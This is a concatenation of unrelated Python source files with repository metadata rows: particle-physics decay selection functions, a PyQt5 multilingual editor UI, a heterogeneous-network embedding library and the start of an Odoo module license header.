Create and return a Z -> pi0 pi0 Selection object, starting with the daughters' selections.
@arg name: name of the Selection.
@arg Pion0Sel: pi0 selection
@arg Pi0Pi0PT: PT of pi0
@arg ZMassWin: Z0 mass window
@return: Selection object
"""
motherCut = "(ADMASS('Z0') < %(ZMassWin)s)" % locals()
strCutdau = "PT > %(Pi0Pi0PT)s" % locals()
daughtersCuts = {'pi0' : strCutdau }
Z0 = CombineParticles(DecayDescriptor="Z0 -> pi0 pi0",
MotherCut=motherCut,
DaughtersCuts = daughtersCuts,
ParticleCombiners = {"" : "MomentumCombiner:PUBLIC"},
ReFitPVs=False)#True)
return Selection(name, Algorithm=Z0, RequiredSelections=[Pion0Sel])
def makeZ2RhoGamma(name, RhoSel, gammaSel, ZMassWin):
"""
Create and return a Z -> Rho(770)0 Gamma Selection object, starting with the daughters' selections.
@arg name: name of the Selection.
@arg Rho: Rho -> pi+ pi- selection
@arg gammaSel: photon selection
@arg ZMassWin: Z0 mass window
@return: Selection object
"""
motherCut = "(ADMASS('Z0') < %(ZMassWin)s)" % locals()
Z0 = CombineParticles(DecayDescriptor="Z0 -> rho(770)0 gamma",
MotherCut=motherCut,
ReFitPVs=False)#True)
return Selection(name, Algorithm=Z0, RequiredSelections=[gammaSel, RhoSel])
def makeZ2OmegaGamma(name, OmegaSel, gammaSel, ZMassWin):
"""
Create and return a Z -> Omega(782)0 Gamma Selection object, starting with the daughters' selections.
@arg name: name of the Selection.
@arg Omega: Omega -> pi+ pi- pi0 selection
@arg gammaSel: photon selection
@arg ZMassWin: Z0 mass window
@return: Selection object
"""
motherCut = "(ADMASS('Z0') < %(ZMassWin)s)" % locals()
Z0 = CombineParticles(DecayDescriptor="Z0 -> omega(782) gamma",
MotherCut=motherCut,
ReFitPVs=False)#True)
return Selection(name, Algorithm=Z0, RequiredSelections=[gammaSel, OmegaSel])
def makeZ2KstGamma(name, KstSel, gammaSel, ZMassWin):
"""
Create and return a Z -> K* Gamma Selection object, starting with the daughters' selections.
@arg name: name of the Selection.
@arg KstSel: K* -> K+ pi- selection
@arg gammaSel: photon selection
@arg ZMassWin: Z0 mass window
@return: Selection object
"""
motherCut = "(ADMASS('Z0') < %(ZMassWin)s)" % locals()
Z0 = CombineParticles(DecayDescriptor="[Z0 -> K*(892)0 gamma]cc",
MotherCut=motherCut,
ReFitPVs=False)#True)
return Selection(name, Algorithm=Z0, RequiredSelections=[gammaSel, KstSel])
def makeZ2PhiGamma(name, phiSel, gammaSel, ZMassWin):
"""
Create and return a Z -> Phi Gamma Selection object, starting with the daughters' selections.
@arg name: name of the Selection.
@arg phiSel: Phi -> K+ K+ selection
@arg gammaSel: photon selection
@arg ZMassWin: Z0 mass window
@return: Selection object
"""
motherCut = "(ADMASS('Z0') < %(ZMassWin)s)" % locals()
Z0 = CombineParticles(DecayDescriptor="Z0 -> phi(1020) gamma",
MotherCut=motherCut,
ReFitPVs=False)#True)
return Selection(name, Algorithm=Z0, RequiredSelections=[gammaSel, phiSel])
def makeZ2D0Gamma(name, D0Sel, gammaSel, ZMassWin):
"""
Create and return a Z -> D0 Gamma Selection object, starting with the daughters' selections.
@arg name: name of the Selection.
@arg D0Sel: D0 -> K+ pi- selection
@arg gammaSel: photon selection
@arg ZMassWin: Z0 mass window
@return: Selection object
"""
motherCut = "(ADMASS('Z0') < %(ZMassWin)s)" % locals()
Z0 = CombineParticles(DecayDescriptor="Z0 -> D0 gamma",
MotherCut=motherCut,
ReFitPVs=False)#True)
return Selection(name, Algorithm=Z0, RequiredSelections=[gammaSel, D0Sel])
def makeZ2QONGamma(name, QONSel, gammaSel, ZMassWin):
"""
Create and return a Z -> Jpsi/Upsilon Gamma Selection object, starting with the daughters' selections.
@arg name: name of the Selection.
@arg QONSel: Jpsi/Upsilon -> mu mu selection
@arg gammaSel: photon selection
@arg ZMassWin: Z0 mass window
@return: Selection object
"""
motherCut = "(ADMASS('Z0') < %(ZMassWin)s)" % locals()
Z0 = CombineParticles(DecayDescriptor="Z0 -> J/psi(1S) gamma",
MotherCut=motherCut,
ReFitPVs=False)#True)
return Selection(name, Algorithm=Z0, RequiredSelections=[gammaSel, QONSel])
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
04df4861383b7581afd8d54a6fdc8875fe88450c | a170461845f5b240daf2090810b4be706191f837 | /pyqt/DemoFullCode-PythonQt/chap11GUI_Aux/Demo11_1MultiLang/ui_MainWindow.py | 36735a91bc09f4f4433c4a9dc7ff1360ae644a22 | [] | no_license | longhuarst/QTDemo | ec3873f85434c61cd2a8af7e568570d62c2e6da8 | 34f87f4b2337a140122b7c38937ab4fcf5f10575 | refs/heads/master | 2022-04-25T10:59:54.434587 | 2020-04-26T16:55:29 | 2020-04-26T16:55:29 | 259,048,398 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,566 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MainWindow.ui'
#
# Created by: PyQt5 UI code generator 5.10.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(770, 471)
MainWindow.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.centralWidget = QtWidgets.QWidget(MainWindow)
self.centralWidget.setObjectName("centralWidget")
self.textEdit = QtWidgets.QPlainTextEdit(self.centralWidget)
self.textEdit.setGeometry(QtCore.QRect(55, 15, 626, 281))
font = QtGui.QFont()
font.setPointSize(12)
self.textEdit.setFont(font)
self.textEdit.setObjectName("textEdit")
MainWindow.setCentralWidget(self.centralWidget)
self.menuBar = QtWidgets.QMenuBar(MainWindow)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 770, 23))
self.menuBar.setObjectName("menuBar")
self.menu_E = QtWidgets.QMenu(self.menuBar)
self.menu_E.setObjectName("menu_E")
self.menu_F = QtWidgets.QMenu(self.menuBar)
self.menu_F.setObjectName("menu_F")
self.menu = QtWidgets.QMenu(self.menu_F)
self.menu.setObjectName("menu")
self.menu_F_2 = QtWidgets.QMenu(self.menuBar)
self.menu_F_2.setObjectName("menu_F_2")
MainWindow.setMenuBar(self.menuBar)
self.mainToolBar = QtWidgets.QToolBar(MainWindow)
self.mainToolBar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.mainToolBar.setObjectName("mainToolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.mainToolBar)
self.statusBar = QtWidgets.QStatusBar(MainWindow)
self.statusBar.setObjectName("statusBar")
MainWindow.setStatusBar(self.statusBar)
self.actEdit_Cut = QtWidgets.QAction(MainWindow)
self.actEdit_Cut.setEnabled(False)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/icons/images/200.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actEdit_Cut.setIcon(icon)
self.actEdit_Cut.setObjectName("actEdit_Cut")
self.actEdit_Copy = QtWidgets.QAction(MainWindow)
self.actEdit_Copy.setEnabled(False)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(":/icons/images/202.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actEdit_Copy.setIcon(icon1)
self.actEdit_Copy.setObjectName("actEdit_Copy")
self.actEdit_Paste = QtWidgets.QAction(MainWindow)
self.actEdit_Paste.setEnabled(False)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(":/icons/images/204.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actEdit_Paste.setIcon(icon2)
self.actEdit_Paste.setObjectName("actEdit_Paste")
self.actFont_Bold = QtWidgets.QAction(MainWindow)
self.actFont_Bold.setCheckable(True)
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(":/icons/images/500.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFont_Bold.setIcon(icon3)
self.actFont_Bold.setObjectName("actFont_Bold")
self.actFont_Italic = QtWidgets.QAction(MainWindow)
self.actFont_Italic.setCheckable(True)
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap(":/icons/images/502.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFont_Italic.setIcon(icon4)
self.actFont_Italic.setObjectName("actFont_Italic")
self.actFont_UnderLine = QtWidgets.QAction(MainWindow)
self.actFont_UnderLine.setCheckable(True)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap(":/icons/images/504.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFont_UnderLine.setIcon(icon5)
self.actFont_UnderLine.setObjectName("actFont_UnderLine")
self.actClose = QtWidgets.QAction(MainWindow)
icon6 = QtGui.QIcon()
icon6.addPixmap(QtGui.QPixmap(":/icons/images/132.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actClose.setIcon(icon6)
self.actClose.setObjectName("actClose")
self.actSys_ToggleText = QtWidgets.QAction(MainWindow)
self.actSys_ToggleText.setCheckable(True)
self.actSys_ToggleText.setChecked(True)
self.actSys_ToggleText.setObjectName("actSys_ToggleText")
self.actEdit_SelectAll = QtWidgets.QAction(MainWindow)
self.actEdit_SelectAll.setObjectName("actEdit_SelectAll")
self.actFile_New = QtWidgets.QAction(MainWindow)
icon7 = QtGui.QIcon()
icon7.addPixmap(QtGui.QPixmap(":/icons/images/100.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFile_New.setIcon(icon7)
self.actFile_New.setObjectName("actFile_New")
self.actFile_Open = QtWidgets.QAction(MainWindow)
icon8 = QtGui.QIcon()
icon8.addPixmap(QtGui.QPixmap(":/icons/images/122.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFile_Open.setIcon(icon8)
self.actFile_Open.setObjectName("actFile_Open")
self.actFile_Save = QtWidgets.QAction(MainWindow)
icon9 = QtGui.QIcon()
icon9.addPixmap(QtGui.QPixmap(":/icons/images/104.bmp"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actFile_Save.setIcon(icon9)
self.actFile_Save.setObjectName("actFile_Save")
self.actLang_CN = QtWidgets.QAction(MainWindow)
self.actLang_CN.setCheckable(True)
self.actLang_CN.setChecked(True)
icon10 = QtGui.QIcon()
icon10.addPixmap(QtGui.QPixmap(":/icons/images/CN.jpg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actLang_CN.setIcon(icon10)
self.actLang_CN.setObjectName("actLang_CN")
self.actLang_EN = QtWidgets.QAction(MainWindow)
self.actLang_EN.setCheckable(True)
self.actLang_EN.setChecked(False)
icon11 = QtGui.QIcon()
icon11.addPixmap(QtGui.QPixmap(":/icons/images/timg2.jpg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actLang_EN.setIcon(icon11)
self.actLang_EN.setObjectName("actLang_EN")
self.menu_E.addAction(self.actEdit_Cut)
self.menu_E.addAction(self.actEdit_Copy)
self.menu_E.addAction(self.actEdit_Paste)
self.menu_E.addSeparator()
self.menu_E.addAction(self.actEdit_SelectAll)
self.menu.addAction(self.actLang_CN)
self.menu.addAction(self.actLang_EN)
self.menu_F.addAction(self.actFont_Bold)
self.menu_F.addAction(self.actFont_Italic)
self.menu_F.addAction(self.actFont_UnderLine)
self.menu_F.addSeparator()
self.menu_F.addAction(self.actSys_ToggleText)
self.menu_F.addAction(self.menu.menuAction())
self.menu_F_2.addAction(self.actFile_New)
self.menu_F_2.addAction(self.actFile_Open)
self.menu_F_2.addAction(self.actFile_Save)
self.menu_F_2.addSeparator()
self.menu_F_2.addAction(self.actClose)
self.menuBar.addAction(self.menu_F_2.menuAction())
self.menuBar.addAction(self.menu_E.menuAction())
self.menuBar.addAction(self.menu_F.menuAction())
self.mainToolBar.addAction(self.actFile_New)
self.mainToolBar.addAction(self.actFile_Open)
self.mainToolBar.addAction(self.actFile_Save)
self.mainToolBar.addSeparator()
self.mainToolBar.addAction(self.actEdit_Cut)
self.mainToolBar.addAction(self.actEdit_Copy)
self.mainToolBar.addAction(self.actEdit_Paste)
self.mainToolBar.addSeparator()
self.mainToolBar.addAction(self.actFont_Bold)
self.mainToolBar.addAction(self.actFont_Italic)
self.mainToolBar.addAction(self.actFont_UnderLine)
self.mainToolBar.addSeparator()
self.mainToolBar.addAction(self.actLang_CN)
self.mainToolBar.addAction(self.actLang_EN)
self.mainToolBar.addSeparator()
self.mainToolBar.addAction(self.actClose)
self.retranslateUi(MainWindow)
self.actEdit_Cut.triggered.connect(self.textEdit.cut)
self.actEdit_Copy.triggered.connect(self.textEdit.copy)
self.actEdit_Paste.triggered.connect(self.textEdit.paste)
self.actEdit_SelectAll.triggered.connect(self.textEdit.selectAll)
self.actClose.triggered.connect(MainWindow.close)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Demo11_1,多语言界面"))
self.menu_E.setTitle(_translate("MainWindow", "编辑(&E)"))
self.menu_F.setTitle(_translate("MainWindow", "格式(&M)"))
self.menu.setTitle(_translate("MainWindow", "界面语言"))
self.menu_F_2.setTitle(_translate("MainWindow", "文件(&F)"))
self.actEdit_Cut.setText(_translate("MainWindow", "剪切"))
self.actEdit_Cut.setToolTip(_translate("MainWindow", "剪切到粘贴板"))
self.actEdit_Cut.setShortcut(_translate("MainWindow", "Ctrl+X"))
self.actEdit_Copy.setText(_translate("MainWindow", "复制"))
self.actEdit_Copy.setToolTip(_translate("MainWindow", "复制到粘贴板"))
self.actEdit_Copy.setShortcut(_translate("MainWindow", "Ctrl+C"))
self.actEdit_Paste.setText(_translate("MainWindow", "粘贴"))
self.actEdit_Paste.setToolTip(_translate("MainWindow", "从粘贴板粘贴"))
self.actEdit_Paste.setShortcut(_translate("MainWindow", "Ctrl+V"))
self.actFont_Bold.setText(_translate("MainWindow", "粗体"))
self.actFont_Bold.setToolTip(_translate("MainWindow", "粗体"))
self.actFont_Italic.setText(_translate("MainWindow", "斜体"))
self.actFont_Italic.setToolTip(_translate("MainWindow", "斜体"))
self.actFont_UnderLine.setText(_translate("MainWindow", "下划线"))
self.actFont_UnderLine.setToolTip(_translate("MainWindow", "下划线"))
self.actClose.setText(_translate("MainWindow", "关闭"))
self.actClose.setToolTip(_translate("MainWindow", "关闭本窗口"))
self.actSys_ToggleText.setText(_translate("MainWindow", "显示按钮文字"))
self.actSys_ToggleText.setToolTip(_translate("MainWindow", "显示工具栏按钮文字"))
self.actEdit_SelectAll.setText(_translate("MainWindow", "全选"))
self.actEdit_SelectAll.setToolTip(_translate("MainWindow", "全选"))
self.actEdit_SelectAll.setShortcut(_translate("MainWindow", "Ctrl+A"))
self.actFile_New.setText(_translate("MainWindow", "新建"))
self.actFile_New.setToolTip(_translate("MainWindow", "新建文件"))
self.actFile_New.setShortcut(_translate("MainWindow", "Ctrl+N"))
self.actFile_Open.setText(_translate("MainWindow", "打开..."))
self.actFile_Open.setToolTip(_translate("MainWindow", "打开文件"))
self.actFile_Open.setShortcut(_translate("MainWindow", "Ctrl+O"))
self.actFile_Save.setText(_translate("MainWindow", "保存"))
self.actFile_Save.setToolTip(_translate("MainWindow", "保存修改"))
self.actFile_Save.setShortcut(_translate("MainWindow", "Ctrl+S"))
self.actLang_CN.setText(_translate("MainWindow", "汉语"))
self.actLang_CN.setToolTip(_translate("MainWindow", "汉语界面"))
self.actLang_EN.setText(_translate("MainWindow", "English"))
self.actLang_EN.setToolTip(_translate("MainWindow", "English interface"))
import res_rc
| [
"841105197@qq.com"
] | 841105197@qq.com |
d88a0c782a8bc73f4d9a36576f31ecbb9dc9cec7 | d4f28073663e228e8bd119a70d17a8a21fc849c9 | /algorithms/libHIN/embeddings.py | f48db9584826b168d8bbb09aa8b5de536741ac5f | [] | no_license | wsgan001/embedding_graph | fe81fa6cd81265a1b371d5de0dc4889bf7572763 | 93b49015dd2610e4348b2f7e3dc90405bd803c36 | refs/heads/master | 2021-08-27T18:54:47.803771 | 2017-11-23T09:36:05 | 2017-11-23T09:36:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,559 | py | ## this is the embedding code
from .dataStructures import HeterogeneousInformationNetwork
from .core import stochastic_normalization, page_rank
from .infolog import emit_state
import numpy as np
import scipy.sparse as sp
from .community_detection import *
from .graphlet_calculation import count_graphlets_orca
from .deep_features import deep_embedding_gp
import networkx as nx
from collections import Counter
from .node2vec_interface import get_n2v_embedding
## compute communities
def return_communities(net):
G = nx.Graph()
rows,cols = net.nonzero()
for row,col in zip(rows,cols):
G.add_edge(row,col)
partitions = best_partition(G)
cnts = Counter(partitions.values())
sizes = {k:cnts[v] for k,v in partitions.items()}
return sizes
def return_clustering_coefficients(net):
## triangle-based clustering
G = nx.from_scipy_sparse_matrix(net)
clusterings = nx.clustering(G)
return clusterings
def return_load_centralities(net):
## triangle-based clustering
G = nx.from_scipy_sparse_matrix(net)
centralities = nx.load_centrality(G)
return centralities
def return_betweenness_centralities(net):
## triangle-based clustering
G = nx.from_scipy_sparse_matrix(net)
centralities = nx.betweenness_centrality(G)
return centralities
## compute a page rank feature vector
def pr_kernel(index_row):
pr = page_rank(graph, [index_row], try_shrink=True)
norm = np.linalg.norm(pr, 2)
if norm > 0:
pr = pr / np.linalg.norm(pr, 2)
return (index_row,pr)
else:
return None
def hinmine_embedding_n2v(hin,use_decomposition=True,return_type="matrix",verbose=False,generate_edge_features = None, from_mat=False,outfile=None,n2v_binary="./node2vec"):
assert isinstance(hin, HeterogeneousInformationNetwork)
if use_decomposition:
if verbose:
emit_state("Using decomposed networks..")
n = hin.decomposed['decomposition'].shape[0]
## if weighted != False;
## elementwise product with the ground thruth network
graph = stochastic_normalization(hin.decomposed['decomposition'])
else:
if from_mat:
graph = hin.graph
n = hin.graph.shape[0]
else:
if verbose:
emit_state("Using raw networks..")
## this works on a raw network.
n = len(hin.graph)
if hin.weighted != False:
converted = nx.to_scipy_sparse_matrix(hin.graph,weight=hin.weighted)
else:
converted = nx.to_scipy_sparse_matrix(hin.graph)
if verbose:
emit_state("Normalizing the adj matrix..")
graph = stochastic_normalization(converted) ## normalize
try:
targets = hin.label_matrix.todense() ## convert targets to dense representation..
except:
targets = hin.label_matrix
pass
n2v_embedded = get_n2v_embedding(graph,n2v_binary)
## get n2v embedding, pass on as result
return {'data' : n2v_embedded,'targets' : targets}
def generate_deep_embedding(X, target=None,
encoding_dim = 50,
reg=10e-5,
sample=1,
act="tanh",
epoch=400,
bsize=90):
from keras.layers import Input, Dense, Activation,ActivityRegularization
from keras.layers.advanced_activations import LeakyReLU
from keras.models import Model
from keras import regularizers
from keras.callbacks import EarlyStopping
ssize = int(X.shape[1]*sample)
idx = np.random.randint(X.shape[1], size=ssize)
if sample == 1:
tra = X
else:
tra = X[idx]
if target.any():
if sample == 1:
tar = target
else:
tar = target[idx]
## sample
i_shape = int(X.shape[0])
o_shape = int(target.shape[1])
print("Beginning training on {} and target {}".format(tra.shape,tar.shape))
## THE ARCHITECTURE ##
input_matrix = Input(shape=(i_shape,))
encoded = Dense(encoding_dim)(input_matrix)
reg1 = ActivityRegularization(l1=reg)(encoded)
if act == "lrelu":
activation = LeakyReLU()(reg1)
else:
activation = Activation(act)(reg1)
decoded = Dense(o_shape, activation='sigmoid')(activation)
## THE ARCHITECTURE ##
# this model maps an input to its reconstruction
autoencoder = Model(input_matrix, decoded)
encoder = Model(input_matrix, encoded)
autoencoder.compile(optimizer='adam', loss='binary_crossentropy')
print("finished deep model compilation..")
stopping = EarlyStopping(monitor='loss', patience=10, verbose=0, mode='auto')
if target.any():
autoencoder.fit(tra,tar,epochs=epoch,batch_size=bsize,shuffle=True,verbose=0,callbacks=[stopping])
else:
autoencoder.fit(tra,tra,epochs=epoch,batch_size=bsize,shuffle=True,verbose=0,callbacks=[stopping])
Xo = encoder.predict(X)
print("Encoding stage complete, current shape: {}".format(Xo.shape))
return (Xo,encoder)
def hinmine_laplacian(hin,use_decomposition=True,return_type="matrix",from_mat=False,verbose=True):
assert isinstance(hin, HeterogeneousInformationNetwork)
if use_decomposition:
if verbose:
emit_state("Using decomposed networks..")
n = hin.decomposed['decomposition'].shape[0]
## if weighted != False;
## elementwise product with the ground thruth network
graph = hin.decomposed['decomposition']
else:
if from_mat:
graph = hin.graph
n = hin.graph.shape[0]
else:
if verbose:
emit_state("Using raw networks..")
## this works on a raw network.
n = len(hin.graph)
if hin.weighted != False:
graph = nx.to_scipy_sparse_matrix(hin.graph,weight=hin.weighted)
else:
graph = nx.to_scipy_sparse_matrix(hin.graph)
if verbose:
emit_state("Normalizing the adj matrix..")
from scipy.sparse import csgraph
vectors = csgraph.laplacian(graph, normed=True)
try:
targets = hin.label_matrix.todense() ## convert targets to dense representation..
except:
targets = hin.label_matrix
pass
return {'data' : vectors.todense(),'targets':targets}
def hinmine_deep_gp(hin,use_decomposition=True,return_type="matrix",verbose=False,generate_edge_features = None, from_mat=False,outfile=None,graphlet_binary="./orca"):
assert isinstance(hin, HeterogeneousInformationNetwork)
if use_decomposition:
if verbose:
emit_state("Using decomposed networks..")
n = hin.decomposed['decomposition'].shape[0]
## if weighted != False;
## elementwise product with the ground thruth network
graph = stochastic_normalization(hin.decomposed['decomposition'])
else:
if from_mat:
graph = hin.graph
n = hin.graph.shape[0]
else:
if verbose:
emit_state("Using raw networks..")
## this works on a raw network.
n = len(hin.graph)
if hin.weighted != False:
converted = nx.to_scipy_sparse_matrix(hin.graph,weight=hin.weighted)
else:
converted = nx.to_scipy_sparse_matrix(hin.graph)
if verbose:
emit_state("Normalizing the adj matrix..")
graph = stochastic_normalization(converted) ## normalize
graphlets = count_graphlets_orca(graph,graphlet_binary)
try:
targets = hin.label_matrix.todense() ## convert targets to dense representation..
except:
targets = hin.label_matrix
pass
graphlets_embedded = deep_embedding_gp(graphlets,targets,nlayers=100)
return {'data' : graphlets_embedded,'targets' : targets}
def hinmine_embedding_gp(hin,use_decomposition=True,return_type="matrix",verbose=False,generate_edge_features = None, from_mat=False,outfile=None,graphlet_binary="./orca",deep_embedding=True):
assert isinstance(hin, HeterogeneousInformationNetwork)
if use_decomposition:
if verbose:
emit_state("Using decomposed networks..")
n = hin.decomposed['decomposition'].shape[0]
## if weighted != False;
## elementwise product with the ground thruth network
graph = stochastic_normalization(hin.decomposed['decomposition'])
else:
if from_mat:
graph = hin.graph
n = hin.graph.shape[0]
else:
if verbose:
emit_state("Using raw networks..")
## this works on a raw network.
n = len(hin.graph)
if hin.weighted != False:
converted = nx.to_scipy_sparse_matrix(hin.graph,weight=hin.weighted)
else:
converted = nx.to_scipy_sparse_matrix(hin.graph)
if verbose:
emit_state("Normalizing the adj matrix..")
graph = stochastic_normalization(converted) ## normalize
## .......................
## .......................
## local topology - graphlets
## .......................
## .......................
## raw data - initial setup
graphlets = count_graphlets_orca(graph,graphlet_binary)
targets = hin.label_matrix.todense() ## convert targets to dense representation..
from sklearn.model_selection import train_test_split
## train on small percent of the data
X_train, X_test, y_train, y_test = train_test_split(graphlets, targets, test_size=0.1, random_state=42)
autoencoders = [] ## model container
print("Beginning with recursive embeddings..")
for j in range(15): ## how many recursive embeddings
deeper_level_embedding, encoder = generate_deep_embedding(X_test, y_test)
autoencoders.append(encoder)
X_test = np.concatenate((X_test,deeper_level_embedding),axis=1)
## encript the rest of the data
print("Applying {} autoencoders..".format(len(autoencoders)))
## use trained autoencoders
for enc in autoencoders:
encoding = enc.predict(graphlets)
graphlets = np.concatenate((graphlets,encoding), axis=1)
print("Final shape:{}".format(graphlets.shape))
return {'data' : graphlets,'targets' : hin.label_matrix, 'decision_threshold' : 0.5}
def hinmine_embedding_pr(hin,use_decomposition=True, parallel=True,return_type="matrix",verbose=False, generate_edge_features = None,from_mat=False, outfile=None,feature_permutator_first="0000",deep_embedding=False,reorder_by_communities=False,simple_input=False,simple_weighted=False):
# fc_operators = []
## list of possible features
topology_operators = ["clustering_information",
"load_centrality_information",
"betweenness_centrality_information",
"community_information"]
## map t|f to individual operators
operator_bool = [True if x == "1" else False for x in feature_permutator_first]
## map to feature vectors
operator_map = dict(zip(topology_operators,operator_bool))
if verbose:
emit_state("Beginning embedding process..")
global graph ## this holds the graph being processes
if simple_input: ## use as a class
n = len(hin.nodes())
if simple_weighted != False:
graph = nx.to_scipy_sparse_matrix(hin,weight="weight")
else:
graph = nx.to_scipy_sparse_matrix(hin)
graph = stochastic_normalization(graph)
else: ## use within the hinmine
# embed the input network to a term matrix
assert isinstance(hin, HeterogeneousInformationNetwork)
## .......................
## Use decomposed network
## .......................
if use_decomposition:
if verbose:
emit_state("Using decomposed networks..")
n = hin.decomposed['decomposition'].shape[0]
graph = stochastic_normalization(hin.decomposed['decomposition'])
## .......................
## Use raw, weighted network
## .......................
else:
if from_mat:
if verbose:
emit_state("Using matrix directly..")
graph = stochastic_normalization(hin.graph)
n = hin.graph.shape[0]
else:
if verbose:
emit_state("Using raw networks..")
## this works on a raw network.
n = len(hin.graph)
if hin.weighted != False:
converted = nx.to_scipy_sparse_matrix(hin.graph,weight=hin.weighted)
else:
converted = nx.to_scipy_sparse_matrix(hin.graph)
if verbose:
emit_state("Normalizing the adj matrix..")
graph = stochastic_normalization(converted) ## normalize
## .......................
## .......................
## Graph embedding part
## .......................
## .......................
## use parallel implementation of PR
if parallel:
import mkl
mkl.set_num_threads(1) ## this ports process to individual cores
if verbose:
emit_state("Parallel embedding in progress..")
import multiprocessing as mp ## initialize the MP part
with mp.Pool(processes=mp.cpu_count()) as p:
results = p.map(pr_kernel,range(n)) ## those are the embedded vectors
## the baseline
else:
if verbose:
emit_state("Non-Parallel embedding in progress..")
results = []
for index in range(n):
pr = page_rank(graph, [index], try_shrink=True)
norm = np.linalg.norm(pr, 2)
if norm > 0:
pr = pr / np.linalg.norm(pr, 2)
results.append((index,pr))
if verbose:
emit_state("Finished with embedding..")
if operator_map["community_information"]:
## .......................
## .......................
## global topology - communities
## .......................
## .......................
if verbose:
emit_state("Mapping the community information..")
partition_sizes = return_communities(graph)
for k,v in partition_sizes.items():
for res in results:
if res != None:
res[1][k]*=v
if operator_map["load_centrality_information"]:
## .......................
## .......................
## global topology - basic load paths
## .......................
## .......................
centralities= return_load_centralities(graph)
for k,v in centralities.items():
for res in results:
if res != None:
res[1][k]*=v
if operator_map["betweenness_centrality_information"]:
## .......................
## .......................
## global topology - centrality
## .......................
## .......................
centralities= return_betweenness_centralities(graph)
max_cent = np.amax(centralities.values())
for k,v in centralities.items():
for res in results:
if res != None:
res[1][k]*=v
if operator_map["clustering_information"]:
## .......................
## .......................
## global topology - basic clustering
## .......................
## .......................
clusterings = return_clustering_coefficients(graph)
for k,v in clusterings.items():
for res in results:
if res != None:
res[1][k]*=v
if generate_edge_features != None:
emit_state("Generating edge-based features")
pass
if verbose:
emit_state("Writing to output..")
## a se kar tu natrenira? Threshold tudi?
if return_type == "matrix":
size_threshold = 100000
if n > size_threshold:
vectors = sp.csr_matrix((n, n))
else:
vectors = np.zeros((n, n))
for pr_vector in results:
if pr_vector != None:
if n > size_threshold:
col = range(0,n,1)
row = np.repeat(pr_vector[0],n)
val = pr_vector[1]
vectors = vectors + sp.csr_matrix((val, (row,col)), shape=(vdim[0],vdim[1]), dtype=float)
else:
vectors[pr_vector[0],:] = pr_vector[1]
try:
hin.label_matrix = hin.label_matrix.todense()
except:
pass
if deep_embedding:
if verbose:
emit_state("Generating the deep embedding..")
vectors, encoder = generate_deep_embedding(vectors, target = hin.label_matrix)
if simple_input:
return {'data' : vectors}
else:
return {'data' : vectors,'targets' : hin.label_matrix}
elif return_type == "file":
if outfile != None:
f=open(outfile,'a')
for rv in results:
if rv != None:
index = rv[0] ## indices
vals = rv[1] ## pagerank vectors
fv = np.concatenate(([index],vals))
outstring = ",".join([str(x) for x in fv.tolist()])+"\n"
f.write(outstring)
f.close()
else:
print("Please enter output file name..")
pass
else:
## return bo dodelan, verjetno zgolj dve matriki tho.
train_features = {
'data': vectors[hin.train_indices, :],
'target': hin.label_matrix[hin.train_indices, :],
'target_names': [str(x) for x in hin.label_list],
'DESCR': None
}
test_features = {
'data': vectors[hin.test_indices, :],
'target_names': [str(x) for x in hin.label_list],
'DESCR': None
}
return {'train_features': train_features, 'test_features': test_features}
class hinmine_embedding:
def __init__(self, method,augmentation="none"):
self.method = method
self.augmentation = augmentation
def learn_embedding(self, graph, is_weighted=True, edge_f=None, no_python=None):
if self.method == "pagerank":
results = hinmine_embedding_pr(graph,use_decomposition=True, parallel=True,return_type="matrix", outfile=None,feature_permutator_first="0000",simple_input=True,simple_weighted=is_weighted,verbose=True)
return (results['data'],True)
| [
"skrljblaz@gmail.com"
] | skrljblaz@gmail.com |
ea41d337a31b2b87ff214078d6af68efe6081d38 | b09f0db1feadd6b6f18c2590ff1eae9413409b5a | /bista_iugroup/billing_form.py | adb16992e9eadc25cdc50e62b17d685126f1f462 | [] | no_license | suningwz/IUG | fdb4a09ed742902b350dd99701ad694aaeb67dd7 | 87d44bc3321703e54e4ea29de1c32a2224235180 | refs/heads/master | 2022-12-02T23:03:18.397818 | 2020-08-14T08:51:33 | 2020-08-14T08:51:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74,232 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
